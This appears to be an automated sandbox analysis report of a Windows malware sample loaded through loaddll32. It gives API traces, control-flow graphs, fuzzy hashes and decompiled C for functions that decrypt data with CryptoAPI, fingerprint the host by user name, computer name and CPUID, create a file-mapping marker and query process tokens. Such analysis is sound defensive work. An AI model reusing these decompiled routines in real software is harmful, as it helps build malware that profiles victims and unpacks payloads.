                  • Part of subcall function 046D6126: GetVersion.KERNEL32(?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D6171
                  • Part of subcall function 046D6126: GetModuleHandleA.KERNEL32(000015DB,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D61A5
                  • Part of subcall function 046D75A8: RtlAllocateHeap.NTDLL(00000000,-00000003,77639EB0), ref: 046D75C2
                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,046C8D64,?), ref: 046D45E9
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D45FA
                • CloseHandle.KERNEL32(00000448,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D460E
                • GetUserNameA.ADVAPI32(00000000,?), ref: 046D4657
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D466A
                • GetUserNameA.ADVAPI32(00000000,?), ref: 046D467F
                • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 046D46AF
                • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D46C4
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D46CE
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D46DB
                • GetShellWindow.USER32 ref: 046D46F6
                • GetWindowThreadProcessId.USER32(00000000), ref: 046D46FD
                • memcpy.NTDLL(046EE374,?,00000018,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D4739
                • CreateEventA.KERNEL32(046EE268,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,046C8D64,?), ref: 046D47B7
                • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 046D47E1
                • OpenEventA.KERNEL32(00100000,00000000,04C9B9D0,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D4809
                • CreateEventA.KERNEL32(046EE268,00000001,00000000,04C9B9D0,?,?,?,?,?,?,?,046C8D64,?), ref: 046D481E
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D4824
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D48BC
                • SetEvent.KERNEL32(?,046E3A35,00000000,00000000,?,?,?,?,?,?,?,046C8D64,?), ref: 046D4952
                • RtlAllocateHeap.NTDLL(00000000,00000043,046E3A35), ref: 046D4967
                • wsprintfA.USER32 ref: 046D4997
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                • String ID:
                • API String ID: 3929413950-0
                • Opcode ID: 904b7d8da50abb4fe78e5d6a922c4f2b9819bf45316ac5c14cb0a15f58fca6a6
                • Instruction ID: 53c103cf66643d55b1dd78757ecc52c77535f397b9087bf0cd620c15d83bbfbc
                • Opcode Fuzzy Hash: 904b7d8da50abb4fe78e5d6a922c4f2b9819bf45316ac5c14cb0a15f58fca6a6
                • Instruction Fuzzy Hash: F6C160B0A003459FD720EF67E84896A7BE8EB95714B40582EF545CB244FB3ABC45CF62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C178F2 Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 221 1c178f2-1c17932 CryptAcquireContextW 222 1c17a89-1c17a8f GetLastError 221->222 223 1c17938-1c17974 memcpy CryptImportKey 221->223 224 1c17a92-1c17a99 222->224 225 1c17a74-1c17a7a GetLastError 223->225 226 1c1797a-1c1798c CryptSetKeyParam 223->226 227 1c17a7d-1c17a87 CryptReleaseContext 225->227 228 1c17a60-1c17a66 GetLastError 226->228 229 1c17992-1c1799b 226->229 227->224 230 1c17a69-1c17a72 CryptDestroyKey 228->230 231 1c179a3-1c179b0 call 1c12114 229->231 232 1c1799d-1c1799f 229->232 230->227 236 1c17a57-1c17a5e 231->236 237 1c179b6-1c179bf 231->237 232->231 234 1c179a1 232->234 234->231 236->230 238 1c179c2-1c179ca 237->238 239 1c179cc 238->239 240 1c179cf-1c179ec memcpy 238->240 239->240 241 1c17a07-1c17a16 CryptDecrypt 240->241 242 1c179ee-1c17a05 CryptEncrypt 240->242 243 1c17a1c-1c17a1e 241->243 242->243 244 1c17a20-1c17a2a 243->244 245 1c17a2e-1c17a39 GetLastError 243->245 244->238 246 1c17a2c 244->246 247 1c17a3b-1c17a4b 245->247 248 1c17a4d-1c17a55 call 1c12c11 245->248 246->247 247->230 248->230
                C-Code - Quality: 58%
                			E01C178F2(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x1c1a0a8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x1c1a0d0() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x11f
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E01C12114(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x1c1a0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E01C12C11(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                0x01c178fb
                0x01c17901
                0x01c17904
                0x01c1790a
                0x01c1790a
                0x01c1790c
                0x01c1790e
                0x01c17911
                0x01c17917
                0x01c17918
                0x01c17919
                0x01c1791f
                0x01c17924
                0x01c1792a
                0x01c17932
                0x01c17a8f
                0x01c17938
                0x01c1793a
                0x01c17943
                0x01c17948
                0x01c1795a
                0x01c1795d
                0x01c17961
                0x01c17968
                0x01c1796c
                0x01c17974
                0x01c17a7a
                0x01c1797a
                0x01c1797a
                0x01c1797e
                0x01c1797f
                0x01c17981
                0x01c1798c
                0x01c17a66
                0x01c17992
                0x01c17992
                0x01c17995
                0x01c1799b
                0x01c179a1
                0x01c179a1
                0x01c179a9
                0x01c179ad
                0x01c179b0
                0x01c17a57
                0x01c179b6
                0x01c179bc
                0x01c179bf
                0x01c179c2
                0x01c179c4
                0x01c179c7
                0x01c179ca
                0x01c179cc
                0x01c179cc
                0x01c179d6
                0x01c179db
                0x01c179de
                0x01c179e1
                0x01c179e3
                0x01c179ec
                0x01c17a16
                0x01c179ee
                0x01c179ff
                0x01c179ff
                0x01c17a1e
                0x00000000
                0x00000000
                0x01c17a20
                0x01c17a23
                0x01c17a26
                0x01c17a2a
                0x00000000
                0x01c17a2c
                0x01c17a3b
                0x01c17a41
                0x01c17a49
                0x01c17a49
                0x00000000
                0x01c17a2a
                0x01c17a2e
                0x01c17a36
                0x01c17a39
                0x01c17a50
                0x00000000
                0x00000000
                0x00000000
                0x01c17a39
                0x01c179b0
                0x01c17a69
                0x01c17a6c
                0x01c17a6c
                0x01c17a81
                0x01c17a81
                0x01c17a99

                APIs
                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,01C17307), ref: 01C1792A
                • memcpy.NTDLL(?,01C17307,00000010,?,?,?,?,?,?,?,?,?,?,01C11ACD,00000000,01C14F92), ref: 01C17943
                • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 01C1796C
                • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 01C17984
                • memcpy.NTDLL(00000000,01C14F92,01C17307,0000011F), ref: 01C179D6
                • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,01C17307,00000020,?,?,0000011F), ref: 01C179FF
                • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,01C17307,?,?,0000011F), ref: 01C17A16
                • GetLastError.KERNEL32(?,?,0000011F), ref: 01C17A2E
                • GetLastError.KERNEL32 ref: 01C17A60
                • CryptDestroyKey.ADVAPI32(?), ref: 01C17A6C
                • GetLastError.KERNEL32 ref: 01C17A74
                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01C17A81
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,01C11ACD,00000000,01C14F92,01C17307,?,01C17307), ref: 01C17A89
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                • String ID:
                • API String ID: 1967744295-0
                • Opcode ID: 67fd88cde551d328bd140be6a4805028a7afdcf85125c5168145e5276d3207c0
                • Instruction ID: 894d65a07fadf6ceb6f4f54b2ce308676cbd24b8434f55bddc70e86eb83faa48
                • Opcode Fuzzy Hash: 67fd88cde551d328bd140be6a4805028a7afdcf85125c5168145e5276d3207c0
                • Instruction Fuzzy Hash: 8C516E72940249FFDB10DFA9DC85AEE7BB9FB09350F004425F906E6244D771CB54AB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C15F8B Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 251 1c15f8b-1c15f9f 252 1c15fa1-1c15fa6 251->252 253 1c15fa9-1c15fbb call 1c17452 251->253 252->253 256 1c15fbd-1c15fcd GetUserNameW 253->256 257 1c1600f-1c1601c 253->257 258 1c1601e-1c16035 GetComputerNameW 256->258 259 1c15fcf-1c15fdf RtlAllocateHeap 256->259 257->258 260 1c16073-1c16095 258->260 261 1c16037-1c16048 RtlAllocateHeap 258->261 259->258 262 1c15fe1-1c15fee GetUserNameW 259->262 261->260 263 1c1604a-1c16053 GetComputerNameW 261->263 264 1c15ff0-1c15ffc call 1c16576 262->264 265 1c15ffe-1c1600d 262->265 266 1c16055-1c16061 call 1c16576 263->266 267 1c16064-1c16067 263->267 264->265 265->258 266->267 267->260
                C-Code - Quality: 96%
                			E01C15F8B(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x1c1a2c8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E01C17452( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x1c1a2d4 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x1c1a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E01C16576(_v8 + _v8, _t63);
							}
							HeapFree( *0x1c1a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x1c1a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E01C16576(_v8 + _v8, _t63);
						}
						HeapFree( *0x1c1a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                0x01c15f8b
                0x01c15f93
                0x01c15f99
                0x01c15f9c
                0x01c15f9f
                0x01c15fa1
                0x01c15fa6
                0x01c15fa6
                0x01c15fac
                0x01c15fae
                0x01c15fbb
                0x01c1601c
                0x01c15fbd
                0x01c15fc2
                0x01c15fc8
                0x01c15fcd
                0x01c15fdb
                0x01c15fdf
                0x01c15fee
                0x01c15ff5
                0x01c15ffc
                0x01c15ffc
                0x01c16007
                0x01c16007
                0x01c15fdf
                0x01c15fcd
                0x01c1601e
                0x01c16024
                0x01c1602e
                0x01c16030
                0x01c16035
                0x01c16044
                0x01c16048
                0x01c16053
                0x01c1605a
                0x01c16061
                0x01c16061
                0x01c1606d
                0x01c1606d
                0x01c16048
                0x01c16076
                0x01c16078
                0x01c1607b
                0x01c1607d
                0x01c16080
                0x01c16083
                0x01c1608d
                0x01c16091
                0x01c16095

                APIs
                • GetUserNameW.ADVAPI32(00000000,?), ref: 01C15FC2
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 01C15FD9
                • GetUserNameW.ADVAPI32(00000000,?), ref: 01C15FE6
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C16007
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01C1602E
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 01C16042
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01C1604F
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C1606D
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: HeapName$AllocateComputerFreeUser
                • String ID: Ut
                • API String ID: 3239747167-8415677
                • Opcode ID: 82917160d52b9b2a160e1341f8aa541b6ee2ae88f70a38108f6aa1caeb05b371
                • Instruction ID: 91fadf4ed550c3eb56d2217b706de1e26511bb862145e1fbd4b769cab9de2b75
                • Opcode Fuzzy Hash: 82917160d52b9b2a160e1341f8aa541b6ee2ae88f70a38108f6aa1caeb05b371
                • Instruction Fuzzy Hash: 20315E71A40219EFDB21DFA9DD80BAEBBF9FB5A710F104029E506D3214D771DE00AB14
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C130FD Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 74%
                			E01C130FD(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L01C18076();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x1c1a2d8; // 0x55d5a8
				_t5 = _t13 + 0x1c1b876; // 0x2178e1e
				_t6 = _t13 + 0x1c1b59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L01C17D5A();
				_t17 = CreateFileMappingW(0xffffffff, 0x1c1a304, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                0x01c130fd
                0x01c13105
                0x01c13109
                0x01c1310f
                0x01c13114
                0x01c13119
                0x01c1311c
                0x01c1311f
                0x01c13124
                0x01c13125
                0x01c13128
                0x01c1312d
                0x01c13134
                0x01c1313e
                0x01c13140
                0x01c13141
                0x01c13144
                0x01c13160
                0x01c13166
                0x01c1316a
                0x01c131b8
                0x01c1316c
                0x01c13179
                0x01c13189
                0x01c13191
                0x01c131a3
                0x01c131a7
                0x00000000
                0x00000000
                0x01c13193
                0x01c13196
                0x01c1319b
                0x01c1319d
                0x01c1319d
                0x01c1317b
                0x01c1317d
                0x01c131a9
                0x01c131aa
                0x01c131aa
                0x01c13179
                0x01c131bf

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,01C13530,?,?,4D283A53,?,?), ref: 01C13109
                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 01C1311F
                • _snwprintf.NTDLL ref: 01C13144
                • CreateFileMappingW.KERNELBASE(000000FF,01C1A304,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 01C13160
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01C13530,?,?,4D283A53,?), ref: 01C13172
                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 01C13189
                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,01C13530,?,?,4D283A53), ref: 01C131AA
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01C13530,?,?,4D283A53,?), ref: 01C131B2
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID:
                • API String ID: 1814172918-0
                • Opcode ID: aeacd21842989741d188ea053d0ac020343dbe8861720018c69260c84925a1d2
                • Instruction ID: a648de3298942412a60b8bdf80e157fec9828fb9334ce503a766345a5dfb9744
                • Opcode Fuzzy Hash: aeacd21842989741d188ea053d0ac020343dbe8861720018c69260c84925a1d2
                • Instruction Fuzzy Hash: B121EB766C0204FBE721DFA8CC05F8D77B9BB5A764F204021FA06E7198D670D6059B51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C8C50 Relevance: 10.6, APIs: 7, Instructions: 113stringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 375 46c8c50-46c8c62 376 46c8c6c 375->376 377 46c8c64-46c8c6a 375->377 378 46c8c72-46c8c86 call 46d28fe 376->378 377->378 381 46c8c88-46c8c96 StrRChrA 378->381 382 46c8cc2-46c8cec call 46cd4f4 378->382 383 46c8c98-46c8c99 381->383 384 46c8c9b 381->384 389 46c8cee-46c8cf2 382->389 390 46c8d0a-46c8d12 382->390 386 46c8ca1-46c8cbc _strupr lstrlen call 46dd697 383->386 384->386 386->382 389->390 391 46c8cf4-46c8cff 389->391 392 46c8d19-46c8d37 CreateEventA 390->392 393 46c8d14-46c8d17 390->393 391->390 395 46c8d01-46c8d08 391->395 397 46c8d39-46c8d40 call 46c34ea 392->397 398 46c8d6b-46c8d71 GetLastError 392->398 396 46c8d77-46c8d7e 393->396 395->390 395->395 399 46c8d8d-46c8d92 396->399 400 46c8d80-46c8d87 RtlRemoveVectoredExceptionHandler 396->400 397->398 404 46c8d42-46c8d49 397->404 402 46c8d73-46c8d75 398->402 400->399 402->396 402->399 405 46c8d5c-46c8d5f call 46d4560 404->405 406 46c8d4b-46c8d57 RtlAddVectoredExceptionHandler 404->406 408 46c8d64-46c8d69 405->408 406->405 408->398 408->402
                APIs
                • StrRChrA.SHLWAPI(04C9B5B0,00000000,0000005C,?,?,?), ref: 046C8C8C
                • _strupr.NTDLL ref: 046C8CA2
                • lstrlen.KERNEL32(04C9B5B0,?,?), ref: 046C8CAA
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 046C8D2A
                • RtlAddVectoredExceptionHandler.NTDLL(00000000,046C44E1), ref: 046C8D51
                • GetLastError.KERNEL32(?,?,?,?), ref: 046C8D6B
                • RtlRemoveVectoredExceptionHandler.NTDLL(01333FC8), ref: 046C8D81
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                • String ID:
                • API String ID: 2251957091-0
                • Opcode ID: 339fc4df15e163c317b553158e81bb5e1af5214e6ac8b1d3432c5617b0d9312a
                • Instruction ID: e372b62e0cca21f5f8f666385f0edb9bf3da6dfc6c7834be060a40331dadb117
                • Opcode Fuzzy Hash: 339fc4df15e163c317b553158e81bb5e1af5214e6ac8b1d3432c5617b0d9312a
                • Instruction Fuzzy Hash: E031D8729002519FE730BF75D88897E77E5E724315B15552FE912DB281F63ABC808B90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C1373D Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 38%
                			E01C1373D(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E01C12114(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E01C12C11(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                0x01c1374a
                0x01c1374b
                0x01c1374c
                0x01c1374d
                0x01c1374e
                0x01c13752
                0x01c13759
                0x01c13768
                0x01c1376b
                0x01c1376e
                0x01c13775
                0x01c13778
                0x01c1377b
                0x01c1377e
                0x01c13781
                0x01c1378c
                0x01c1378e
                0x01c13797
                0x01c1379f
                0x01c137a1
                0x01c137b3
                0x01c137bd
                0x01c137c1
                0x01c137d0
                0x01c137d4
                0x01c137dd
                0x01c137e5
                0x01c137e5
                0x01c137e7
                0x01c137e7
                0x01c137ef
                0x01c137f5
                0x01c137f9
                0x01c137f9
                0x01c13804

                APIs
                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 01C13784
                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 01C13797
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 01C137B3
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 01C137D0
                • memcpy.NTDLL(?,00000000,0000001C), ref: 01C137DD
                • NtClose.NTDLL(?), ref: 01C137EF
                • NtClose.NTDLL(00000000), ref: 01C137F9
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                • String ID:
                • API String ID: 2575439697-0
                • Opcode ID: 6208c4a888f0770bc872d3ebd2d864ab46542e48e3c115c03e7c76987b594c56
                • Instruction ID: 2d7ea102a881641710fe7d4d2309498472b61ace961f6f130b9ddd3635bdc3f7
                • Opcode Fuzzy Hash: 6208c4a888f0770bc872d3ebd2d864ab46542e48e3c115c03e7c76987b594c56
                • Instruction Fuzzy Hash: CC2157B1940219FBDF10AFA4CD45ADEBFBCFB09764F204066FA01A6154D371CA80ABA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CD4F4 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 046CD53B
                • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 046CD54E
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 046CD56A
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 046CD587
                • memcpy.NTDLL(?,00000000,0000001C), ref: 046CD594
                • NtClose.NTDLL(?), ref: 046CD5A6
                • NtClose.NTDLL(?), ref: 046CD5B0
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
